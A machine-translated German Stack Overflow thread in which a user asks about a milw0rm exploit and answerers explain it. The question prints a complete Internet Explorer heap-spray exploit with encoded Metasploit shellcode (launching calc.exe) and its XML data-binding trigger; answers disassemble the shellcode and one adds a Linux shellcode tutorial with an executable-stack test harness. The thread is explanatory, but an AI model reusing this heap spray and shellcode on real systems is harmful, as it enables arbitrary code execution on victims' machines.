wake-up-neo.com

Hilf mir, diesen JavaScript-Exploit zu verstehen

Normalerweise habe ich keine Schwierigkeiten, das JavaScript-Skript zu lesen, aber ich kann die Logik nicht verstehen. Der Code stammt von einem Exploit, der vor 4 Tagen veröffentlicht wurde. Sie finden es unter milw0rm .

Hier ist der Code:

<html>
    <div id="replace">x</div>
    <script>
        // windows/exec - 148 bytes
        // http://www.metasploit.com
        // Encoder: x86/shikata_ga_nai
        // EXITFUNC=process, CMD=calc.exe
        var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

        // ugly heap spray, the d0nkey way!
        // works most of the time
        var spray = unescape("%u0a0a%u0a0a");

        do {
           spray += spray;
        } while(spray.length < 0xd0000);

        memory = new Array();

        for(i = 0; i < 100; i++)
           memory[i] = spray + shellcode;

        xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

        tag = document.getElementById("replace");
        tag.innerHTML = xmlcode;

    </script>
</html>

Ich glaube daran, dass es das tut, und ich möchte, dass Sie mir für den Teil helfen, den ich falsch verstanden habe.

Die Variable shellcode enthält den Code zum Öffnen der calc.exe. Ich verstehe nicht, wie sie diese seltsame Saite gefunden haben ... keine Idee?

Die zweite Sache ist die Variable spray. Verstehe ich diese komische Schleife nicht?

Die dritte Sache ist die Variable memory, die nirgendwo verwendet wird. Warum erstellen sie sie?

Zum Schluss: Was macht das XML-Tag auf der Seite?

Aktualisieren

Okay, im Moment habe ich gute Antworten, aber meistens sehr. Ich hätte gerne mehr Erklärungen zum Wert des Codes. Ein Beispiel ist unescape("%u0a0a%u0a0a");. Was bedeutet das? Dasselbe für die Schleife, warum schrieb der Entwickler: length < 0xd0000? Ich möchte ein tieferes Verständnis, nicht nur die Theorie dieses Codes.

145

Der Shellcode enthält einige x86-Assembly-Anweisungen, die den eigentlichen Exploit erledigen. spray erstellt eine lange Folge von Anweisungen, die in memory eingefügt werden. Da wir die genaue Position unseres Shellcodes im Speicher normalerweise nicht herausfinden können, fügen wir viele nop-Anweisungen vor und springen irgendwo dorthin. Das memory-Array enthält den eigentlichen x86-Code zusammen mit dem Sprungmechanismus. Wir werden das erstellte XML der Bibliothek mit einem Fehler zuführen. Wenn er analysiert wird, bewirkt der Fehler, dass das Befehlszeigerregister irgendwo in unserem Exploit zugewiesen wird, was zur Ausführung von beliebigem Code führt.

Für ein tieferes Verständnis sollten Sie herausfinden, was im x86-Code enthalten ist. unscape wird verwendet, um die Reihenfolge der Bytes der Zeichenfolge in die Variable spray zu setzen. Es ist ein gültiger x86-Code, der einen großen Teil des Heaps ausfüllt und an den Anfang des Shellcodes springt. Der Grund für die Endebedingung ist die Begrenzung der Zeichenfolgenlänge der Skript-Engine. Sie dürfen keine Zeichenfolgen größer als eine bestimmte Länge haben.

In der x86-Assembly steht 0a0a für or cl, [edx]. Dies entspricht praktisch der Anweisung nop im Sinne unseres Exploits. Wo immer wir in spray springen, gelangen wir zur nächsten Anweisung, bis wir den Shellcode erreichen, den Code, den wir tatsächlich ausführen möchten.

Wenn Sie sich das XML anschauen, sehen Sie, dass auch 0x0a0a vorhanden ist. Um genau zu beschreiben, was passiert, ist eine genaue Kenntnis des Exploits erforderlich (Sie müssen wissen, wo sich der Fehler befindet und wie er ausgenutzt wird, was ich nicht weiß). Es scheint jedoch, dass wir Internet Explorer zwingen, den fehlerhaften Code auszulösen, indem Sie innerHtml auf diese schädliche XML-Zeichenfolge setzen. Internet Explorer versucht, es zu analysieren, und der fehlerhafte Code gibt auf irgendeine Weise die Kontrolle an einem Speicherort, an dem das Array vorhanden ist (da es sich um einen großen Block handelt, ist die Wahrscheinlichkeit hoch, dort zu springen). Wenn wir dorthin springen, wird die CPU or cl, [edx]-Anweisungen ausführen, bis der Anfang des Shellcodes erreicht ist, der im Speicher abgelegt wurde.

Ich habe den Shellcode zerlegt:

00000000  C9                leave
00000001  2B1F              sub ebx,[edi]
00000003  B10C              mov cl,0xc
00000005  BDC536DB9B        mov ebp,0x9bdb36c5
0000000A  D9C5              fld st5
0000000C  2474              and al,0x74
0000000E  5A                pop edx
0000000F  F4                hlt
00000010  EA8331FC0B6A6A    jmp 0x6a6a:0xbfc3183
00000017  03D4              add edx,esp
00000019  07                pop es
0000001A  67305CFF          xor [si-0x1],bl
0000001E  98                cwde
0000001F  BBD7FFA4FE        mov ebx,0xfea4ffd7
00000024  9B                wait
00000025  74AD              jz 0xffffffd4
00000027  058B8B028D        add eax,0x8d028b8b
0000002C  D893BCCD35A2      fcom dword [ebx+0xa235cdbc]
00000032  37                aaa
00000033  B84290A63A        mov eax,0x3aa69042
00000038  94                xchg eax,esp
00000039  E99AA4D58D        jmp 0x8dd5a4d8
0000003E  E5A3              in eax,0xa3
00000040  1F                pop ds
00000041  4C                dec esp
00000042  EB46              jmp short 0x8a
00000044  4B                dec ebx
00000045  8CD0              mov eax,ss
00000047  AD                lodsd
00000048  A844              test al,0x44
0000004A  52                Push edx
0000004B  4A                dec edx
0000004C  3B81B80DD748      cmp eax,[ecx+0x48d70db8]
00000052  4B                dec ebx
00000053  D46C              aam 0x6c
00000055  46                inc esi
00000056  1392734A204F      adc edx,[edx+0x4f204a73]
0000005C  F8                clc
0000005D  6E                outsb
0000005E  DC8EA20726B4      fmul qword [esi+0xb42607a2]
00000064  04D4              add al,0xd4
00000066  D084ECBA978221    rol byte [esp+ebp*8+0x218297ba],1
0000006D  7CE8              jl 0x57
0000006F  C0CA8C            ror dl,0x8c
00000072  F4                hlt
00000073  A6                cmpsb
00000074  47                inc edi
00000075  210D2EA0B0CD      and [0xcdb0a02e],ecx
0000007B  2CA8              sub al,0xa8
0000007D  B05B              mov al,0x5b
0000007F  43                inc ebx
00000080  F4                hlt
00000081  24E8              and al,0xe8
00000083  7A9C              jpe 0x21
00000085  BB857DCBA0        mov ebx,0xa0cb7d85
0000008A  7DED              jnl 0x79
0000008C  92                xchg eax,edx
0000008D  09E1              or ecx,esp
0000008F  96                xchg eax,esi
00000090  315580            xor [ebp-0x80],edx

Um diesen Shellcode zu verstehen, sind x86 Assembly-Kenntnisse und das Problem in der MS-Bibliothek selbst erforderlich (um zu wissen, wie der Systemstatus ist, wenn wir hier ankommen), nicht JavaScript! Dieser Code führt calc.exe aus.

315
Mehrdad Afshari

Sie sollten sich mit Heap Spraying beschäftigen:

http://en.wikipedia.org/wiki/Heap_spraying

13
BobbyShaftoe

Dies sieht aus wie ein Angriff auf den aktuellen Internet Explorer-Fehler , für den Microsoft den Notfall-Patch veröffentlicht hat. Es verwendet einen Fehler in der Datenbindungsfunktion des XML-Handlers von Microsoft, der dazu führt, dass Heap-Speicher falsch freigegeben wird.

Shellcode ist Maschinencode, der ausgeführt wird, wenn der Fehler auftritt. Spray und Speicher sind nur ein Teil des Speicherplatzes, um den ausnutzbaren Zustand zu ermöglichen.

10
Tim Farley

Heap-Spraying ist eine gängige Methode, um Browser-Sachen auszunutzen. Wenn Sie sich damit beschäftigen, können Sie mehrere Beiträge wie diese finden: http://sf-freedom.blogspot.com/2006/06/heap-spraying-introduction.html

3
dr. evil

Jedes Mal, wenn ich Speicher sehe, der in einer Exploit-Diskussion nicht angesprochen wird, ist mein erster Gedanke, dass es sich bei dem Exploit um eine Art Pufferüberlauf handelt. In diesem Fall verursacht der Speicher entweder einen Pufferüberlauf oder ein Zugriff auf den Pufferüberlauf .

2
Brian

Einfaches Shellcode-Beispiel

Hallo Welt in Assembly bei & t Syntax x86 glaube ich (Wizard in Training).

die Datei einrichten: vim shellcodeExample.s

.text           #required
.goblal _start  #required

_start:         #main function
 jmp one        #jump to the section labeled one:

two:
 pop  %rcx         #pop %rcx off the stack, or something
 xor  %rax, %rax   #Clear
 movl 4, %rax      #use sys_write(printf || std::cout)
 xor  %rbx, %rbx   #Clear
 inc  %rbx         #increment %rbx to 1 stdout(terminal)
 xor  %rdx, %rdx   #Clear Registers or something
 movb $13, %dl     #String Size
 int  $0x80

one:
 call two                   #jump up to section two:
 .ascii "Hello World\r\n"   #make the string one of the starting memory 
                            #^-addresses

kompilieren Sie wie folgt: as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.o

Jetzt haben Sie eine Binärdatei, die Hallo Welt . Ausgibt, um die Binärdatei in Shell-Code zu konvertieren: objdump -D shellcode

sie erhalten die Ausgabe: 

shellcode:     file format elf64-x86-64


Disassembly of section .text:

0000000000400078 <.text>:
  400078:   eb 1a                   jmp    0x400094
  40007a:   59                      pop    %rcx
  40007b:   48 31 c0                xor    %rax,%rax
  40007e:   b0 04                   mov    $0x4,%al
  400080:   48 31 db                xor    %rbx,%rbx
  400083:   48 ff c3                inc    %rbx
  400086:   48 31 d2                xor    %rdx,%rdx
  400089:   b2 0d                   mov    $0xd,%dl
  40008b:   cd 80                   int    $0x80
  40008d:   b0 01                   mov    $0x1,%al
  40008f:   48 ff cb                dec    %rbx
  400092:   cd 80                   int    $0x80
  400094:   e8 e1 ff ff ff          callq  0x40007a
  400099:   68 65 6c 6c 6f          pushq  $0x6f6c6c65
  40009e:   20 77 6f                and    %dh,0x6f(%rdi)
  4000a1:   72 6c                   jb     0x40010f
  4000a3:   64                      fs
  4000a4:   0d                      .byte 0xd
  4000a5:   0a                      .byte 0xa

Wenn Sie nun in der vierten Zeile mit Text suchen, sehen Sie: 400078: eb 1a jmp 0x400094

der Teil, der eb 1a sagt, ist die hexadezimale Darstellung der Assembly-Anweisung jmp one, wobei "eins" die Speicheradresse Ihrer Zeichenfolge ist.

um Ihren Shellcode für die Ausführung vorzubereiten, öffnen Sie eine weitere Textdatei und speichern Sie die Hex-Werte in einem Zeichenarray. Um den Shell-Code korrekt zu formatieren, geben Sie vor jedem Hex-Wert einen \x ein.

das kommende Shell-Codebeispiel sieht entsprechend der Ausgabe des Befehls objdump wie folgt aus:

unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

In diesem Beispiel wird C für das Array ..__ verwendet. Jetzt haben Sie funktionierenden Shellcode, der in stdout "Hallo Welt" schreibt.

sie können den Shell-Code testen, indem Sie ihn in eine Sicherheitsanfälligkeit setzen, oder Sie können das folgende c-Programm schreiben, um es zu testen:

vim execShellcode.cc; //linux command to create c file.

/*Below is the content of execShellcode.cc*/
unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

int main(){
    ((void(*)(void))PAYLOAD)();
    return 0;
}

Um das Programm zu kompilieren, geben Sie Folgendes ein: 

gcc -fno-stack-protector -z execstack execShellcode.cc -o run

laufen mit ./run Sie wissen, dass es ein funktionierendes Beispiel für die Entwicklung einfacher Shellcodes gibt, das in Linux Mint/Debian getestet wurde.

0
user6090272

Siehe Zeichenkodierungen in HTML .

Es sind binäre Daten, die als Zeichenfolge codiert sind und von JavaScript decodiert werden.

Häufige Form von XSS auch.

Sie können alle Codierungs-Tricks hier sehen:

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

0
Chad Grant

Dies ist von metasploit, das heißt, es verwendet einen von metasploit-Shell-Codes. Es ist Open Source, so dass Sie es kaufen können: http://www.metasploit.com/

0
dr. evil

Um mehr über die Sicherheitsanfälligkeit zu erfahren, würde ich empfehlen, MS08-078 und die SDL zu lesen.

0
Grant Wagner